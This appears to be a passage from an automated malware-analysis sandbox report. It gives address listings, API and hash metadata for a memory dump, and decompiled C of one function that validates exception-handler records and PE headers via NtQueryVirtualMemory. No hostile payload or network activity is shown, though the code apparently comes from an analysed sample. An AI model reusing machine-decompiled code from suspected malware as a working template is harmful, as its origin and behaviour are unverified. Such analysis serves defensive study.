                                                                                                                                                                                                                                                            0x004023ae
                                                                                                                                                                                                                                                            0x004023da
                                                                                                                                                                                                                                                            0x004023da
                                                                                                                                                                                                                                                            0x004023dc
                                                                                                                                                                                                                                                            0x004023de
                                                                                                                                                                                                                                                            0x004023f2
                                                                                                                                                                                                                                                            0x004023f4
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023e0
                                                                                                                                                                                                                                                            0x004023e0
                                                                                                                                                                                                                                                            0x004023e0
                                                                                                                                                                                                                                                            0x004023e9
                                                                                                                                                                                                                                                            0x004023ea
                                                                                                                                                                                                                                                            0x004023ec
                                                                                                                                                                                                                                                            0x004023ee
                                                                                                                                                                                                                                                            0x004023ee
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023e0
                                                                                                                                                                                                                                                            0x004023b0
                                                                                                                                                                                                                                                            0x004023b3
                                                                                                                                                                                                                                                            0x004023b5
                                                                                                                                                                                                                                                            0x004023c7
                                                                                                                                                                                                                                                            0x004023c7
                                                                                                                                                                                                                                                            0x004023ca
                                                                                                                                                                                                                                                            0x004023cc
                                                                                                                                                                                                                                                            0x004023cc
                                                                                                                                                                                                                                                            0x004023cd
                                                                                                                                                                                                                                                            0x004023cd
                                                                                                                                                                                                                                                            0x004023d3
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023b7
                                                                                                                                                                                                                                                            0x004023b7
                                                                                                                                                                                                                                                            0x004023b7
                                                                                                                                                                                                                                                            0x004023be
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023c0
                                                                                                                                                                                                                                                            0x004023c0
                                                                                                                                                                                                                                                            0x004023c1
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023c1
                                                                                                                                                                                                                                                            0x004023c3
                                                                                                                                                                                                                                                            0x004023c5
                                                                                                                                                                                                                                                            0x004023d8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023d8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023c5
                                                                                                                                                                                                                                                            0x00402337
                                                                                                                                                                                                                                                            0x0040233a
                                                                                                                                                                                                                                                            0x0040233d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040233f
                                                                                                                                                                                                                                                            0x00402341
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402341
                                                                                                                                                                                                                                                            0x00402306
                                                                                                                                                                                                                                                            0x00402308
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402376
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2850889275-0
                                                                                                                                                                                                                                                            • Opcode ID: f0b349cd896020e887df37ddcef8d7c086aed87c3e3135285b8186848bcb6a02
                                                                                                                                                                                                                                                            • Instruction ID: e9f14f906c9536e11cb0cdf805d1eb774a66923aaedbf4c251f4098029d02f9e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0b349cd896020e887df37ddcef8d7c086aed87c3e3135285b8186848bcb6a02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4861D5306006029BDB29CB39DB9C62A73A5FB95358B24807BDD55FB2D0E3FCDC818658
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E0487B2F1(long _a4) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                            				short* _v32;
                                                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                                            				signed int* _t68;
                                                                                                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                                                                                                            				intOrPtr* _t71;
                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				void _t80;
                                                                                                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                                                                                                            				short* _t87;
                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                            				signed int* _t90;
                                                                                                                                                                                                                                                            				long _t91;
                                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                            				long _t108;
                                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t108 = _a4;
                                                                                                                                                                                                                                                            				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                            				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                            				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                            					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                            					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                            					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                            						_t91 = 0;
                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                            						_a4 = 0;
                                                                                                                                                                                                                                                            						_t57 = _t76;
                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                            							_t80 =  *_t57;
                                                                                                                                                                                                                                                            							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                            							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                            							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                                            								_t63 = 0;
                                                                                                                                                                                                                                                            								L60:
                                                                                                                                                                                                                                                            								return _t63;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                                            							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                            							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                            								_t12 =  &_a4;
                                                                                                                                                                                                                                                            								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                            								__eflags =  *_t12;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                            							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                            							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                            						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                            						__eflags = _a4;
                                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                            							_t81 =  *0x487d2d8; // 0x0
                                                                                                                                                                                                                                                            							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                            							_t58 = 0;
                                                                                                                                                                                                                                                            							__eflags = _t81;
                                                                                                                                                                                                                                                            							if(_t81 <= 0) {
                                                                                                                                                                                                                                                            								L18:
                                                                                                                                                                                                                                                            								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                            								__eflags = _t61;
                                                                                                                                                                                                                                                            								if(_t61 < 0) {
                                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t62 = _a4;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                            									L59:
                                                                                                                                                                                                                                                            									_t63 = _t104;
                                                                                                                                                                                                                                                            									goto L60;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                            									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                            									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                            										L46:
                                                                                                                                                                                                                                                            										_t63 = 1;
                                                                                                                                                                                                                                                            										 *0x487d320 = 1;
                                                                                                                                                                                                                                                            										__eflags =  *0x487d320;
                                                                                                                                                                                                                                                            										if( *0x487d320 != 0) {
                                                                                                                                                                                                                                                            											goto L60;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										_t84 =  *0x487d2d8; // 0x0
                                                                                                                                                                                                                                                            										__eflags = _t84;
                                                                                                                                                                                                                                                            										_t93 = _t84;
                                                                                                                                                                                                                                                            										if(_t84 <= 0) {
                                                                                                                                                                                                                                                            											L51:
                                                                                                                                                                                                                                                            											__eflags = _t93;
                                                                                                                                                                                                                                                            											if(_t93 != 0) {
                                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                                            												 *0x487d320 = 0;
                                                                                                                                                                                                                                                            												goto L5;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t77 = 0xf;
                                                                                                                                                                                                                                                            											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                            											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                            												_t77 = _t84;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t94 = 0;
                                                                                                                                                                                                                                                            											__eflags = _t77;
                                                                                                                                                                                                                                                            											if(_t77 < 0) {
                                                                                                                                                                                                                                                            												L56:
                                                                                                                                                                                                                                                            												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                            												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                            													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                            													__eflags = _t86;
                                                                                                                                                                                                                                                            													 *0x487d2d8 = _t86;
                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                                                            													_t68 = 0x487d2e0 + _t94 * 4;
                                                                                                                                                                                                                                                            													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                            													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                            													 *_t68 = _t110;
                                                                                                                                                                                                                                                            													_t110 =  *_t68;
                                                                                                                                                                                                                                                            												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                            												goto L56;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										_t69 = 0x487d2dc + _t84 * 4;
                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                            											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                            											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                            												goto L51;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                            											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                            											__eflags = _t93;
                                                                                                                                                                                                                                                            											if(_t93 > 0) {
                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											goto L51;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										goto L51;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t87 = _v32;
                                                                                                                                                                                                                                                            									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                            									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                            									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                            									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                            									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                            									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                            									if(_t78 < _t72) {
                                                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                            										goto L20;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(0x487d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(0x487d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                            								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                            								if(_t58 < _t81) {
                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(_t58 <= 0) {
                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							 *0x487d320 = 1;
                                                                                                                                                                                                                                                            							__eflags =  *0x487d320;
                                                                                                                                                                                                                                                            							if( *0x487d320 != 0) {
                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(0x487d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(0x487d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                                            								_t100 = 0;
                                                                                                                                                                                                                                                            								__eflags = _t58;
                                                                                                                                                                                                                                                            								if(_t58 < 0) {
                                                                                                                                                                                                                                                            									L34:
                                                                                                                                                                                                                                                            									 *0x487d320 = 0;
                                                                                                                                                                                                                                                            									goto L5;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                                            									L33:
                                                                                                                                                                                                                                                            									_t90 = 0x487d2e0 + _t100 * 4;
                                                                                                                                                                                                                                                            									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                            									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                            									 *_t90 = _t110;
                                                                                                                                                                                                                                                            									_t110 =  *_t90;
                                                                                                                                                                                                                                                            								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                            								goto L34;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                                                            							_t58 = _t25;
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(_t58 < 0) {
                                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                                            								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                            								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                            									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                            									__eflags = _t81;
                                                                                                                                                                                                                                                            									 *0x487d2d8 = _t81;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                                                            								_t58 = _t28;
                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								L25:
                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(0x487d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(0x487d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                            								__eflags = _t58;
                                                                                                                                                                                                                                                            								if(_t58 >= 0) {
                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(__eflags >= 0) {
                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                            									goto L34;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                            						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                            						if(_t75 < _v8) {
                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                            						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                                            					goto L60;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}




































                                                                                                                                                                                                                                                            0x0487b2fb
                                                                                                                                                                                                                                                            0x0487b2fe
                                                                                                                                                                                                                                                            0x0487b304
                                                                                                                                                                                                                                                            0x0487b322
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b322
                                                                                                                                                                                                                                                            0x0487b30c
                                                                                                                                                                                                                                                            0x0487b315
                                                                                                                                                                                                                                                            0x0487b31b
                                                                                                                                                                                                                                                            0x0487b32a
                                                                                                                                                                                                                                                            0x0487b32d
                                                                                                                                                                                                                                                            0x0487b330
                                                                                                                                                                                                                                                            0x0487b33a
                                                                                                                                                                                                                                                            0x0487b33a
                                                                                                                                                                                                                                                            0x0487b33c
                                                                                                                                                                                                                                                            0x0487b33f
                                                                                                                                                                                                                                                            0x0487b341
                                                                                                                                                                                                                                                            0x0487b341
                                                                                                                                                                                                                                                            0x0487b343
                                                                                                                                                                                                                                                            0x0487b346
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b348
                                                                                                                                                                                                                                                            0x0487b34a
                                                                                                                                                                                                                                                            0x0487b3b0
                                                                                                                                                                                                                                                            0x0487b3b0
                                                                                                                                                                                                                                                            0x0487b50e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b50e
                                                                                                                                                                                                                                                            0x0487b34c
                                                                                                                                                                                                                                                            0x0487b34c
                                                                                                                                                                                                                                                            0x0487b350
                                                                                                                                                                                                                                                            0x0487b352
                                                                                                                                                                                                                                                            0x0487b352
                                                                                                                                                                                                                                                            0x0487b352
                                                                                                                                                                                                                                                            0x0487b352
                                                                                                                                                                                                                                                            0x0487b355
                                                                                                                                                                                                                                                            0x0487b356
                                                                                                                                                                                                                                                            0x0487b359
                                                                                                                                                                                                                                                            0x0487b359
                                                                                                                                                                                                                                                            0x0487b35d
                                                                                                                                                                                                                                                            0x0487b361
                                                                                                                                                                                                                                                            0x0487b36f
                                                                                                                                                                                                                                                            0x0487b36f
                                                                                                                                                                                                                                                            0x0487b377
                                                                                                                                                                                                                                                            0x0487b37d
                                                                                                                                                                                                                                                            0x0487b37f
                                                                                                                                                                                                                                                            0x0487b381
                                                                                                                                                                                                                                                            0x0487b391
                                                                                                                                                                                                                                                            0x0487b39e
                                                                                                                                                                                                                                                            0x0487b3a2
                                                                                                                                                                                                                                                            0x0487b3a7
                                                                                                                                                                                                                                                            0x0487b3a9
                                                                                                                                                                                                                                                            0x0487b427
                                                                                                                                                                                                                                                            0x0487b427
                                                                                                                                                                                                                                                            0x0487b3ab
                                                                                                                                                                                                                                                            0x0487b3ab
                                                                                                                                                                                                                                                            0x0487b3ab
                                                                                                                                                                                                                                                            0x0487b429
                                                                                                                                                                                                                                                            0x0487b42b
                                                                                                                                                                                                                                                            0x0487b50c
                                                                                                                                                                                                                                                            0x0487b50c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b431
                                                                                                                                                                                                                                                            0x0487b431
                                                                                                                                                                                                                                                            0x0487b438
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b43e
                                                                                                                                                                                                                                                            0x0487b442
                                                                                                                                                                                                                                                            0x0487b49e
                                                                                                                                                                                                                                                            0x0487b4a0
                                                                                                                                                                                                                                                            0x0487b4a8
                                                                                                                                                                                                                                                            0x0487b4aa
                                                                                                                                                                                                                                                            0x0487b4ac
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4ae
                                                                                                                                                                                                                                                            0x0487b4b4
                                                                                                                                                                                                                                                            0x0487b4b6
                                                                                                                                                                                                                                                            0x0487b4b8
                                                                                                                                                                                                                                                            0x0487b4cd
                                                                                                                                                                                                                                                            0x0487b4cd
                                                                                                                                                                                                                                                            0x0487b4cf
                                                                                                                                                                                                                                                            0x0487b4fe
                                                                                                                                                                                                                                                            0x0487b505
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b505
                                                                                                                                                                                                                                                            0x0487b4d3
                                                                                                                                                                                                                                                            0x0487b4d4
                                                                                                                                                                                                                                                            0x0487b4d6
                                                                                                                                                                                                                                                            0x0487b4d8
                                                                                                                                                                                                                                                            0x0487b4d8
                                                                                                                                                                                                                                                            0x0487b4da
                                                                                                                                                                                                                                                            0x0487b4dc
                                                                                                                                                                                                                                                            0x0487b4de
                                                                                                                                                                                                                                                            0x0487b4f2
                                                                                                                                                                                                                                                            0x0487b4f2
                                                                                                                                                                                                                                                            0x0487b4f5
                                                                                                                                                                                                                                                            0x0487b4f7
                                                                                                                                                                                                                                                            0x0487b4f7
                                                                                                                                                                                                                                                            0x0487b4f8
                                                                                                                                                                                                                                                            0x0487b4f8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4e0
                                                                                                                                                                                                                                                            0x0487b4e0
                                                                                                                                                                                                                                                            0x0487b4e0
                                                                                                                                                                                                                                                            0x0487b4e9
                                                                                                                                                                                                                                                            0x0487b4ea
                                                                                                                                                                                                                                                            0x0487b4ec
                                                                                                                                                                                                                                                            0x0487b4ee
                                                                                                                                                                                                                                                            0x0487b4ee
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4e0
                                                                                                                                                                                                                                                            0x0487b4de
                                                                                                                                                                                                                                                            0x0487b4ba
                                                                                                                                                                                                                                                            0x0487b4c1
                                                                                                                                                                                                                                                            0x0487b4c1
                                                                                                                                                                                                                                                            0x0487b4c3
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4c5
                                                                                                                                                                                                                                                            0x0487b4c6
                                                                                                                                                                                                                                                            0x0487b4c9
                                                                                                                                                                                                                                                            0x0487b4cb
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4cb
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b4c1
                                                                                                                                                                                                                                                            0x0487b444
                                                                                                                                                                                                                                                            0x0487b447
                                                                                                                                                                                                                                                            0x0487b44c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b455
                                                                                                                                                                                                                                                            0x0487b457
                                                                                                                                                                                                                                                            0x0487b45d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b463
                                                                                                                                                                                                                                                            0x0487b469
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b46f
                                                                                                                                                                                                                                                            0x0487b471
                                                                                                                                                                                                                                                            0x0487b47a
                                                                                                                                                                                                                                                            0x0487b47e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b484
                                                                                                                                                                                                                                                            0x0487b487
                                                                                                                                                                                                                                                            0x0487b489
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b490
                                                                                                                                                                                                                                                            0x0487b492
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b494
                                                                                                                                                                                                                                                            0x0487b498
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b498
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b383
                                                                                                                                                                                                                                                            0x0487b383
                                                                                                                                                                                                                                                            0x0487b383
                                                                                                                                                                                                                                                            0x0487b38a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b38c
                                                                                                                                                                                                                                                            0x0487b38d
